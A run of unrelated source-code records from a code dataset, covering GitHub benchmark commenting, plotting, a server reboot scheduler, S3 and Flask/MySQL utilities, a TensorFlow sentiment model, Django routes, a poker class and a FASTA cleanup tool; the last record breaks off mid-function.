GITHUB_TOKEN: personal access token to authenticate against GitHub API.\n\nThis script uses pip package \"markdown_strings\".\n\nExample usage:\n # Export necessary environment variables:\n export ...\n # Then run the script:\n python3 post_benchmarks_as_pr_comment.py ...\n # where each is expected to be of format expected\n # by BenchmarkResults objects.\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport requests\nimport markdown_strings as md\n\nfrom typing import Any, Dict, Sequence, Tuple, Union\n\nfrom common.benchmark_description import BenchmarkResults\n\nGITHUB_IREE_API_PREFIX = \"https://api.github.com/repos/google/iree\"\n\n\ndef get_required_env_var(var: str) -> str:\n \"\"\"Gets the value for a required environment variable.\"\"\"\n value = os.getenv(var, None)\n if value is None:\n raise RuntimeError(f'Missing environment variable \"{var}\"')\n return value\n\n\ndef get_reported_time(bench_results: Sequence[Dict[str, Any]],\n kind: str) -> int:\n \"\"\"Returns the Google Benchmark reported time for the given kind.\"\"\"\n time = None\n for bench_case in bench_results:\n if bench_case[\"name\"].endswith(f\"real_time_{kind}\"):\n if bench_case[\"time_unit\"] != \"ms\":\n raise ValueError(f\"Expected ms as time unit\")\n time = int(round(bench_case[\"real_time\"]))\n break\n if time is None:\n raise ValueError(f\"Cannot found real_time_{kind} in benchmark results\")\n return time\n\n\ndef aggregate_all_benchmarks(\n benchmark_files: Sequence[str]) -> Sequence[Tuple[Union[str, int]]]:\n \"\"\"Aggregates all benchmarks in the given files.\n\n Args:\n - benchmark_files: A list of JSON files, each can be decoded as a\n BenchmarkResults.\n\n Returns:\n - A list of (name, mean-latency, median-latency, stddev-latency) tuples.\n \"\"\"\n\n pr_commit = get_required_env_var(\"BUILDKITE_COMMIT\")\n benchmark_avg_results = {}\n\n for benchmark_file in benchmark_files:\n with open(benchmark_file) as f:\n content = f.read()\n file_results = BenchmarkResults.from_json_str(content)\n\n if file_results.commit != pr_commit:\n raise ValueError(\"Inconsistent pull request commit\")\n\n for benchmark_case in file_results.benchmarks:\n # Make sure each benchmark has a unique name.\n name = str(benchmark_case[\"benchmark\"])\n if name in benchmark_avg_results:\n raise ValueError(f\"Duplicated benchmarks: {name}\")\n\n # Now scan all benchmark iterations and find the average latency.\n mean_time = get_reported_time(benchmark_case[\"results\"], \"mean\")\n median_time = get_reported_time(benchmark_case[\"results\"], \"median\")\n stddev_time = get_reported_time(benchmark_case[\"results\"], \"stddev\")\n\n benchmark_avg_results[name] = (mean_time, median_time, stddev_time)\n\n return sorted([(k,) + v for k, v in benchmark_avg_results.items()])\n\n\ndef get_benchmark_result_markdown(benchmark_files: Sequence[str]) -> str:\n \"\"\"Gets markdown summary of all benchmarks in the given files.\"\"\"\n all_benchmarks = aggregate_all_benchmarks(benchmark_files)\n names, means, medians, stddevs = zip(*all_benchmarks)\n names = (\"Benchmark Name\",) + names\n means = (\"Average Latency (ms)\",) + means\n medians = (\"Median Latency (ms)\",) + medians\n stddevs = (\"Latency Standard Deviation (ms)\",) + stddevs\n\n build_url = get_required_env_var(\"BUILDKITE_BUILD_URL\")\n pr_commit = get_required_env_var(\"BUILDKITE_COMMIT\")\n\n commit = f\"@ commit {pr_commit}\"\n header = md.header(\"Benchmark results\", 3)\n benchmark_table = md.table([names, means, medians, stddevs])\n link = \"See more details on \" + md.link(\"Buildkite\", build_url)\n\n return \"\\n\\n\".join([header, commit, benchmark_table, link])\n\n\ndef comment_on_pr(content):\n \"\"\"Posts the given content as comments to the current pull request.\"\"\"\n pr_number = get_required_env_var(\"BUILDKITE_PULL_REQUEST\")\n # Buildkite sets this to \"false\" if not running on a PR:\n # https://buildkite.com/docs/pipelines/environment-variables#bk-env-vars-buildkite-pull-request\n if pr_number == \"false\":\n raise ValueError(\"Not a pull request\")\n\n api_token = get_required_env_var('GITHUB_TOKEN')\n headers = {\n \"Accept\": \"application/vnd.github.v3+json\",\n \"Authorization\": f\"token {api_token}\",\n }\n payload = json.dumps({\"event\": \"COMMENT\", \"body\": content})\n\n api_endpoint = f\"{GITHUB_IREE_API_PREFIX}/pulls/{pr_number}/reviews\"\n request = requests.post(api_endpoint, data=payload, headers=headers)\n if request.status_code != 200:\n raise requests.RequestException(\n f\"Failed to comment on GitHub; error code: {request.status_code}\")\n\n\ndef parse_arguments():\n \"\"\"Parses command-line options.\"\"\"\n\n def check_file_path(path):\n if os.path.isfile(path):\n return path\n else:\n raise ValueError(path)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"benchmark_files\",\n metavar=\"\",\n type=check_file_path,\n nargs=\"+\",\n help=\"Path to the JSON file containing benchmark results\")\n parser.add_argument(\"--dry-run\",\n action=\"store_true\",\n help=\"Print the comment instead of posting to GitHub\")\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n benchmarks_md = get_benchmark_result_markdown(args.benchmark_files)\n\n if args.dry_run:\n print(benchmarks_md)\n else:\n comment_on_pr(benchmarks_md)\n\n\nif __name__ == \"__main__\":\n main(parse_arguments())\n","sub_path":"build_tools/android/post_benchmarks_as_pr_comment.py","file_name":"post_benchmarks_as_pr_comment.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613750513","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom math import factorial\nimport sis_utils\n\ndef savitzky_golay(y, window_size, order, deriv=0, rate=1):\n try:\n window_size = np.abs(np.int(window_size))\n order = np.abs(np.int(order))\n except ValueError:\n raise ValueError(\"window_size and order have to be of type int\")\n if window_size % 2 != 1 or window_size < 1:\n raise TypeError(\"window_size size must be a positive odd number\")\n if window_size < order + 2:\n raise TypeError(\"window_size is too small for the polynomials order\")\n order_range = range(order + 1)\n half_window = (window_size - 1) // 2\n # precompute coefficients\n b = np.mat([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])\n m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)\n # pad the signal at the extremes with\n # values taken from the signal itself\n firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m[::-1], y, mode='valid')\n\nimg_dir, task_dir = sis_utils.get_task_img_folder()\nfiles = glob(os.path.join(task_dir, '*.csv'))\nfields = ['Step', 'Value']\n\nplt.rcParams.update({'font.size': 16})\nplt.figure(figsize=(8, 4))\nfor file in files:\n df = pd.read_csv(file, skipinitialspace=True, usecols=fields)\n value = savitzky_golay(np.array(df['Value']), 11, 2)\n label_str = ''\n if 'Unet' in file:\n color_str = 'b'\n label_str += 'Unet'\n else:\n color_str = 'g'\n label_str += 'Deeplab'\n if 'xent' in file:\n lst = '--'\n label_str += ' xent'\n else:\n lst = '-'\n label_str += ' focal'\n plt.plot(np.arange(100), value, linestyle=lst, color=color_str, label=label_str)\nplt.xlabel('Epoch')\nplt.ylabel('IoU')\nplt.ylim([0.5, 0.78])\nplt.legend()\nplt.grid('on')\nplt.title('Validation IoU in Training')\nplt.tight_layout()\nplt.savefig(os.path.join(img_dir, 'focal_cmp1.png'))\nplt.show()\n","sub_path":"]tasks/2018.02.20.focal_loss/plot_focal_loss_1.py","file_name":"plot_focal_loss_1.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"449977417","text":"\n'''\nmodule : rebootBot2.py\nversion : see module_version variable\nLanguage : Python 3.x\nauthor : andrew christ\nemail : andrew@openmarmot.com\nnotes : rebootBot2 reboots servers via ssh\n\n'''\n\n\n#import built in modules\nimport time\nimport datetime\nimport os\n#import custom packages\nimport pak_mscript.mscript\nimport pak_ssh.ssh\nimport pak_fileOps.fileUtility\nimport rb2_serverObj\n\n# module specific variables\nmodule_version='0.0' #module software version\nmodule_last_update_date='May 25 2016' #date of last update\n\n#global variables\nalive=True\ndebug=True\nconfigFile='rebootBot2_config'\nserverFile='rebootBot2_servers'\nsleepTime=None\nrebootHours=[]\n\nserverList=[]\n\n\n#--------------------------------------------------\ndef main():\n\tglobal debug\n\tglobal sleepTime\n\tload()\n\n\t#tracking hours and seconds allows the sleepTime adjusted to be < 1 hour\n\t# without causing time dilation\n\taliveSeconds=0\n\taliveHours=0\n\n\n\twhile alive:\n\n\t\tif(str(datetime.datetime.today().hour) in rebootHours):\n\t\t\tfor b in serverList:\n\t\t\t\tif (b.lastReboot+b.rebootInterval)<=aliveHours:\n\t\t\t\t\treboot(b.name)\n\t\t\t\t\tb.lastReboot=aliveHours\n\n\t\tif debug:\n\t\t\tprint('Going to sleep for '+str(sleepTime)+' seconds')\n\t\ttime.sleep(sleepTime)\n\t\taliveSeconds+=sleepTime\n\t\taliveHours=int(aliveSeconds/3600)\n\n\t\tif debug:\n\t\t\tprint('aliveSeconds: '+str(aliveSeconds))\n\t\t\tprint('aliveHours: '+str(aliveHours))\n\n#--------------------------------------------------\n\n#--------------------------------------------------\ndef load():\n\tglobal configFile\n\tglobal serverFile\n\tglobal sleepTime\n\tglobal debug\n\tglobal serverList\n\tglobal rebootHours\n\n\t#spacing keeps everything from being rebooted at once\n\n\tpak_mscript.mscript.load(os.getcwd()+'/'+configFile)\n\tsleepTime=int(pak_mscript.mscript.get('sleepTime'))\n\tdebug=pak_mscript.mscript.getBool('debug')\n\trebootHours=str.split(str(pak_mscript.mscript.get('rebootHours')),',')\n\tpak_mscript.mscript.unload()\n\n\tpak_mscript.mscript.load(os.getcwd()+'/'+serverFile)\n\ttempData=pak_mscript.mscript.getDict()\n\tfor b in tempData:\n\t\tserverList.append(rb2_serverObj.server(b,0,int(tempData[b])))\n\n\tif debug:\n\t\tprint('Load complete')\n\t\tfor b in serverList:\n\t\t\tb.printSelf()\n\n\n#--------------------------------------------------\n\n#--------------------------------------------------\ndef reboot(serverName):\n\tif debug:\n\t\tprint('Rebooting '+serverName+' at '+time.strftime(\"%c\"))\n\tpak_fileOps.fileUtility.appendFile('log.txt',[('Rebooting '+serverName+' at '+time.strftime(\"%c\"))])\n\n\tos.system('python3 pak_ssh/reboot.py '+serverName)\n#--------------------------------------------------\n\n\nmain()\n","sub_path":"rebootBot2.py","file_name":"rebootBot2.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"120112149","text":"\n\nfrom xai.brain.wordbase.nouns._preponderance import _PREPONDERANCE\n\n#calss header\nclass _PREPONDERANCES(_PREPONDERANCE, ):\n\tdef __init__(self,): \n\t\t_PREPONDERANCE.__init__(self)\n\t\tself.name = \"PREPONDERANCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"preponderance\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_preponderances.py","file_name":"_preponderances.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613299644","text":"# Copyright 2019 Atalaya Tech, Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_s3_url(url):\n \"\"\"\n Check if url is an s3, s3n, or s3a url\n \"\"\"\n try:\n return urlparse(url).scheme in [\"s3\", \"s3n\", \"s3a\"]\n except ValueError:\n return False\n\n\ndef create_s3_bucket_if_not_exists(bucket_name, region):\n import boto3\n from botocore.exceptions import ClientError\n\n s3_client = boto3.client('s3', region)\n try:\n s3_client.get_bucket_acl(Bucket=bucket_name)\n logger.debug(\"Found bucket %s in region %s already exist\", bucket_name, region)\n except ClientError as error:\n if error.response and error.response['Error']['Code'] == 'NoSuchBucket':\n logger.debug('Creating s3 bucket: %s in region %s', bucket_name, region)\n\n # NOTE: boto3 will raise ClientError(InvalidLocationConstraint) if\n # `LocationConstraint` is set to `us-east-1` region.\n # https://github.com/boto/boto3/issues/125.\n # This issue still show up in boto3 1.13.4(May 6th 2020)\n try:\n s3_client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={'LocationConstraint': region},\n )\n except ClientError as s3_error:\n if (\n s3_error.response\n and s3_error.response['Error']['Code']\n == 'InvalidLocationConstraint'\n ):\n logger.debug(\n 'Special s3 region: %s, will attempt create bucket without '\n '`LocationConstraint`',\n region,\n )\n s3_client.create_bucket(Bucket=bucket_name)\n else:\n raise s3_error\n else:\n raise error\n","sub_path":"bentoml/utils/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598043526","text":"import mysql.connector\nimport numpy as np\nimport json\nfrom flask_mysqldb import MySQL\nfrom flask import jsonify\nfrom flask import request, Response\nfrom flask import Flask\n\napp = Flask(__name__)\n\n# Please change user and password in order to connect to mysql database\nconfig = {\n 'user': 'xxxx',\n 'password': 'xxx',\n 'host': 'localhost',\n 'database': 'gold_and_silver_price'\n}\n\n\ndef convertDateToNumber(date):\n return int(date.replace('-', ''))\n\n\n@app.route('/commodity')\ndef index():\n\n # convert date to number\n startDate = convertDateToNumber(request.args.get('start_date'))\n endDate = convertDateToNumber(request.args.get('end_date'))\n com_type = request.args.get('commodity_type')\n\n # get data from database(mysql)\n\n connection = mysql.connector.connect(\n host=config[\"host\"], database=config[\"database\"], user=config[\"user\"], passwd=config[\"password\"])\n cur = connection.cursor()\n if com_type == 'gold':\n query = 'select * from gold where numberOfDate >=%s and numberOfDate <=%s'\n else:\n query = 'select * from silver where numberOfDate >=%s and numberOfDate <=%s'\n param = (startDate, endDate)\n cur.execute(query, param)\n data = cur.fetchall()\n\n # calculate data for mean and variance\n obj = {}\n obj[\"data\"] = {}\n list = []\n for t in data:\n obj[\"data\"][t[3]] = float(t[2])\n list.append(float(t[2]))\n\n obj[\"mean\"] = round(np.mean(list), 2) # using numpy(np) to get mean\n obj[\"variance\"] = round(np.var(list), 2) # using numpy(np) to get variance\n p = json.dumps(obj, sort_keys=False, indent=1)\n res = Response(p, mimetype='application/json')\n\n return res\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='8080')\n","sub_path":"secondProgram/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"515984560","text":"\"\"\"\nFile: modelIMDB.py\nLanguage: python3\nAuthor: Ethan David Howes \nPurpose: Build, train, and save a machine learning based\nmodel to preform sentiment analysis on lyrics\n\nModel based on the TensorFlow text classification tutorial:\nhttps://www.tensorflow.org/tutorials/text/text_classification_rnn\n\nUtilizing the Yelp polarity reviews data set provided by tensorflow\n\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\n\n# Load the data set\ndataset, info = tfds.load('yelp_polarity_reviews/subwords8k', with_info=True, as_supervised=True)\n\ntrain_data, test_data = dataset['train'], dataset['test']\n\nencoder = info.features['text'].encoder\n\nBUFFER_SIZE = 1000\nBATCH_SIZE = 64\n\npadded_shapes = ([None], ())\n\ntrain_data = train_data.shuffle(BUFFER_SIZE).padded_batch(BATCH_SIZE, padded_shapes=padded_shapes)\n\ntest_data = test_data.padded_batch(BATCH_SIZE, padded_shapes=padded_shapes)\n\n# Create the recurrent model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(encoder.vocab_size, 64),\n tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(64)),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(loss='binary_crossentropy',\n optimizer=tf.keras.optimizers.Adam(1e-4),\n metrics=['accuracy'])\n\nhistory = model.fit(train_data, epochs=5, validation_data=test_data,\n validation_steps=30)\n\n# Calculate model accuracy\ntest_loss, test_acc = model.evaluate(test_data)\n\nprint('Test Loss: {}'.format(test_loss))\nprint('Test Accuracy: {}'.format(test_acc))\n\n# Save model as JSON\nmodel_json = model.to_json()\nwith open(\"modelYelp.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n# Save weights as h5\nmodel.save_weights(\"modelYelp.h5\")\nprint(\"Saved model to disk\")\n\n# Test Loss: 0.13942851126194\n# Test Accuracy: 0.9471579194068909\n","sub_path":"Lyrics/Models/modelYelp.py","file_name":"modelYelp.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263215182","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nfrom scrum.views import *\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^$', login_required(ProjectListView.as_view()), name='projectlist'),\n url(r'^sprint/(?P[0-9]+)/$', login_required(SprintView.as_view()), name='sprint'),\n url(r'^sprint/(?P[0-9]+)/close/$', close_sprint, name='closesprint'),\n url(r'^project/(?P[0-9]+)/$', login_required(WhiteBoardView.as_view()), name='project'),\n url(r'^project/(?P[0-9]+)/update/$', login_required(update_project), name='updateproject'),\n url(r'^project/(?P[0-9]+)/story/add/$', login_required(add_story), name='addstory'),\n url(r'^project/[0-9]+/story/(?P[0-9]+)/$', login_required(update_story), name='updatestory'),\n url(r'^project/(?P[0-9]+)/task/add/$', login_required(add_task), name='addtask'),\n url(r'^project/[0-9]+/task/(?P[0-9]+)/$', login_required(update_task), name='updatetask'),\n url(r'^project/[0-9]+/sprint-task/add/$', login_required(add_sprint_task), name='updatetask'),\n url(r'^project/(?P[0-9]+)/sprint/add/$', login_required(add_sprint), name='sprintadd'),\n url(r'^project/add/$', login_required(add_project), name='addproject'),\n url(r'^task/(?P[0-9]+)/update-status/$', login_required(update_task), name='updatetaskstatus'),\n\n url(r'^login/?$', 'django.contrib.auth.views.login', {'template_name': 'scrum/registration/login.html', }, name='login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'scrum/registration/logged_out.html', }, name='logout'),\n)\n\nurlpatterns += patterns('',\n (r'^static/(.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT\n }),\n)\n","sub_path":"agile_board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46659423","text":"#! python 3\n\n\nimport time, os, shutil, send2trash\n\n\nLOCATION1 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\\\\Desktop\\\\newone\\\\SuperProjects\\\\\"\nLOCATION2 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\\\\Desktop\\\\newone\\\\SuperProjects\\\\fileFrog\\\\\"\nLOCATION3 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\"\n\n\n\"\"\"\nstrMyDir = os.getcwd()\n\n\ndef chdir_copy(f): #f = a file to copy\n os.chdir(LOCATION1)\n print(strMyDir)\n shutil.copy(LOCATION1 + f, LOCATION2)\n time.sleep(1.5)\n\ndef chdir_copy_tree(f): #f = a folder to copy\n os.chdir(LOCATION1)\n print(strMyDir)\n shutil.copytree(f, LOCATION2 + \"_backUP\") #_backUP: name of new file crated\n time.sleep(1.5)\n\n\ndef chdir_move(f,l): #f = a file to move l = location\n\n shutil.move( f, l)\n time.sleep(1.5)\n\n\n\n\nfile1 = \"play.py\"\nfile2 = \"functions.py\"\n#chdir_copy(file1)\n#chdir_copy(file2)\nfolder1 = LOCATION1 + \"c#Basics\"\n#chdir_copy_tree(folder1)\n\nchdir_move(file1, LOCATION3)\nchdir_move(LOCATION3+file1, LOCATION1)\n#chdir_move()\n\n\n\n\n\nbeaconFile = open('beacon.txt', 'a')\nbeaconFile.write('wadw dwdwdds dfdfddfd d fdf')\ntime.sleep(2)\nbeaconFile.close()\nsend2trash.send2trash('beacon.txt') # send to trash function\n\n\"\"\"\n\n#walking through a dir os.walk return 3 outputs foldername, subfoldername, filenames\nimport os\nx =0\n\nfor folderName, subfolders, filenames in os.walk(LOCATION3):\n print('The current folder is ' + folderName)\n\n for subfolder in subfolders:\n print('SUBFOLDER OF ' + folderName + ': ' + subfolder)\n for filename in filenames:\n print('FILE INSIDE ' + folderName + ': '+ filename)\n\n print(\"#cls\"*len(LOCATION3))\n x+=1\n if x == 10: break\n\n ","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"438271044","text":"from __future__ import annotations\nfrom enum import Enum\nfrom typing import List, Tuple, Optional\nfrom cards import Card\n\n\nclass Player:\n \"\"\"\n Represents a Player in a poker game.\n \"\"\"\n\n def __init__(self, player_name: str = None, player_id: str = None):\n assert player_name is not None\n assert player_id is not None\n\n self.name: str = player_name\n self.id: str = player_id\n\n self._chips: int = 0\n self._pocket_cards: List[Card, Card] = []\n\n def clear_pocket_cards(self):\n self._pocket_cards.clear()\n\n def set_pocket_cards(self, cards: List[Card]):\n assert len(cards) == 2, \"player can only be given 2 pocket cards\"\n self._pocket_cards.clear()\n self._pocket_cards.extend(cards)\n\n\nclass PlayerAction:\n\n class ActionType:\n CHECKFOLD = 1\n FOLD = 2\n CHECK = 3\n SEE = 4\n RAISE = 5\n\n def __init__(self):\n self.action: PlayerAction.ActionType = PlayerAction.ActionType.CHECKFOLD\n self.value: int = 0\n","sub_path":"poker/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595943089","text":"# Author: Garret Kern\r\n#\r\n# Modifications by Josh Cherry 2/16/19:\r\n#\r\n# 1. Fixed bug affecting cleaning of csv files.\r\n# 2. Show user example tag field values (two for each, taken from first\r\n# and last sequence).\r\n# 3. When exiting upon error, wait for user to press return before exiting.\r\n# Also, exit 0 for success, 1 for failure\r\n# 4. Allow .fa in addition to .fas, and check that these are at end of fname.\r\n# 5. Cosmetic changes: spelling, etc.\r\n\r\n# Imports\r\nimport time\r\nimport sys\r\nimport random\r\nimport math\r\n\r\n\r\n# Quit script after short delay\r\ndef quit_success():\r\n print(\"---Script Done---\")\r\n time.sleep(4)\r\n sys.exit(0)\r\n\r\ndef quit():\r\n _ = input('Error in processing; press RETURN to exit: ')\r\n sys.exit(1)\r\n \r\n# Read file for input\r\ndef inputFile(name):\r\n pathname = input(\"Filepath for \" + name\r\n + \" (must be .fa (or .fas) or .csv format): \")\r\n try:\r\n # inputFile = open(pathname, \"r\", encoding=\"utf8\")\r\n inputFile = open(pathname, \"r\")\r\n except Exception:\r\n print(\"File does not exist\")\r\n quit()\r\n try:\r\n inputLines = inputFile.readlines()\r\n except Exception:\r\n inputFile.close()\r\n inputFile = open(pathname, \"r\", encoding=\"utf8\")\r\n inputLines = inputFile.readlines()\r\n\r\n inputFile.close()\r\n\r\n if (\".csv\" in pathname):\r\n splitChar = \",\"\r\n elif (pathname.endswith('.fa') or pathname.endswith('.fas')):\r\n splitChar = \"|\"\r\n else:\r\n print(\"Invalid file extension, must be \\\r\n .csv, .fa, or .fas (the last two equivalent)\")\r\n quit()\r\n return (inputLines,splitChar)\r\n\r\n\r\n# Output to a File\r\ndef outputFile(outputLines):\r\n pathname = input(\"Filepath for output (will create a new file if none exist): \")\r\n outputFile = open(pathname, \"w\")\r\n for line in outputLines:\r\n outputFile.write(line)\r\n outputFile.close()\r\n\r\n\r\n# Remove illgal fasta chars\r\ndef replaceIllegalChars(toChange):\r\n return toChange.rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"\\\"\", \"\")\r\n\r\n\r\n# Format input onto one line\r\n# Can take lines from .fas or .csv file\r\ndef formatInput(inputLines, splitChar):\r\n\r\n # Reformat for analysis\r\n newLines = []\r\n curSequence = replaceIllegalChars(inputLines[0])\r\n count = 0\r\n for line in inputLines[1:]:\r\n if (\">\" in line):\r\n newLines.append(curSequence + \"\\n\")\r\n curSequence = replaceIllegalChars(line)\r\n count = 0\r\n else:\r\n if (count == 0):\r\n curSequence = curSequence + splitChar\r\n curSequence = curSequence + line.rstrip()\r\n count+=1\r\n # Add final line, not added by for loop\r\n newLines.append(curSequence + \"\\n\")\r\n inputLines = newLines\r\n return inputLines\r\n\r\n\r\n# Format output to .fas format\r\ndef outputToFas(outputLines, splitChar):\r\n # Return to fasta format\r\n formatOutput = []\r\n for line in outputLines:\r\n tags = \"|\".join(line.rstrip().split(splitChar)[:-1])\r\n sequence = line.rstrip().split(splitChar)[-1]\r\n formatOutput.append(tags + \"\\n\")\r\n count = 0\r\n chunk = \"\"\r\n for char in sequence:\r\n count += 1\r\n chunk = chunk + char\r\n if count == 60:\r\n formatOutput.append(chunk + \"\\n\")\r\n chunk = \"\"\r\n count = 0\r\n if len(chunk) != 0:\r\n formatOutput.append(chunk + \"\\n\")\r\n\r\n return formatOutput\r\n\r\n\r\nclass Review:\r\n\r\n def findMedianLength(inputLines):\r\n\r\n lens = []\r\n\r\n for line in inputLines:\r\n tagLen = len(line.split(Review.splitChar))\r\n lens.append(tagLen)\r\n\r\n return lens[int(len(lens)/2)]\r\n\r\n\r\n def findBadChars(inputLines):\r\n validLines = []\r\n\r\n for line in inputLines:\r\n if \"\\\"\" in line:\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a quotation\")\r\n elif \"(\" in line:\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a paren\")\r\n elif \" \" in line:\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a space\")\r\n elif (\",\" in line) and (Review.splitChar == \"|\"):\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a comma\")\r\n else:\r\n validLines.append(line)\r\n\r\n return validLines\r\n\r\n\r\n def findLongLines(inputLines):\r\n median = Review.findMedianLength(inputLines)\r\n validLines = []\r\n\r\n for line in inputLines:\r\n tagLen = len(line.split(Review.splitChar))\r\n if not(tagLen == median):\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" has an incorrect number of tags\")\r\n else:\r\n validLines.append(line)\r\n\r\n return validLines\r\n\r\n\r\n def start():\r\n print(\"*** Starting File Reviewer ***\")\r\n print(\"** Find lines with the wrong number of tags and illegal characters **\")\r\n\r\n # Read input\r\n (inputLines, Review.splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, Review.splitChar)\r\n\r\n inputLines = Review.findBadChars(inputLines)\r\n inputLines = Review.findLongLines(inputLines)\r\n\r\n # format output\r\n outputLines = outputToFas(inputLines, Review.splitChar)\r\n # Print good lines to output file\r\n outputFile(outputLines)\r\n\r\n# Cleanup .fas or .csv file\r\nclass Cleanup:\r\n\r\n splitChar = \"\"\r\n\r\n def readCarefully(inputLines):\r\n threshold = float(input(\"Percent of total lines that must have a nucelotide in the column (enter .7 for 70%): \"))\r\n numLines = 0\r\n sequenceDict = {}\r\n curCharDict = {}\r\n\r\n\r\n for line in inputLines:\r\n if (\">\" in line):\r\n id = line\r\n sequenceDict[id] = \"\"\r\n numLines += 1\r\n\r\n colCount = 0\r\n repeat = True\r\n\r\n while(repeat):\r\n # repeat as long as any lines have nucleotides in the colCount position\r\n repeat = False\r\n # count the number of valid nucleotides across all lines in a specific column\r\n nucCount = 0\r\n\r\n for line in inputLines:\r\n if (\">\" in line):\r\n lineCounter = 0\r\n id = line\r\n else:\r\n lineCounter += len(line)\r\n if not(colCount > lineCounter):\r\n curChar = line[colCount - lineCounter]\r\n if (curChar != \"-\"):\r\n nucCount += 1\r\n repeat = True\r\n curCharDict[id] = curChar\r\n\r\n if (nucCount >= threshold * numLines):\r\n for line in inputLines:\r\n if (\">\" in line):\r\n id = line\r\n sequenceDict[id] += curCharDict[id]\r\n colCount += 1\r\n\r\n inputLines = []\r\n\r\n for sequenceId in sequenceDict.keys():\r\n print(sequenceId + Cleanup.splitChar + sequenceDict[sequenceId])\r\n inputLines.append(sequenceId + Cleanup.splitChar + sequenceDict[sequenceId])\r\n\r\n return inputLines\r\n\r\n # Remove duplicates\r\n def removeDuplicates(inputLines):\r\n lineTags = [] # list of unique sequence names\r\n removedLines = [] # removed lines recorded in case needed for output\r\n newLines = [] # each unique line from inputLines\r\n\r\n # Show example tag field values to aid user\r\n def processTag(tag):\r\n '''\r\n If tag length above threshold, replace with\r\n truncation plus '...'\r\n '''\r\n if len(tag) > 30:\r\n return tag[:27] + '...'\r\n return tag\r\n\r\n print('Example tag values:')\r\n print()\r\n tags1 = inputLines[0].split(Cleanup.splitChar)\r\n tags2 = inputLines[-1].split(Cleanup.splitChar)\r\n if len(tags1) != len(tags2):\r\n print('Number of fields in first and last entries not equal')\r\n quit()\r\n for i in range(len(tags1)):\r\n print('%d %-30s %-30s'\r\n % (i, processTag(tags1[i]), processTag(tags2[i])))\r\n print()\r\n\r\n try:\r\n colsComp = list(map(int, input(\"Enter the tag numbers for which duplicates will be compared by (starts at 0, comma-separated): \").split(\",\")))\r\n except Exception:\r\n print(\"Please type numbers separated by commas\")\r\n quit()\r\n\r\n for line in inputLines:\r\n # Include everything but the sequence\r\n # Removes sequences with exactly duplicate tags\r\n tags = \"\"\r\n for col in 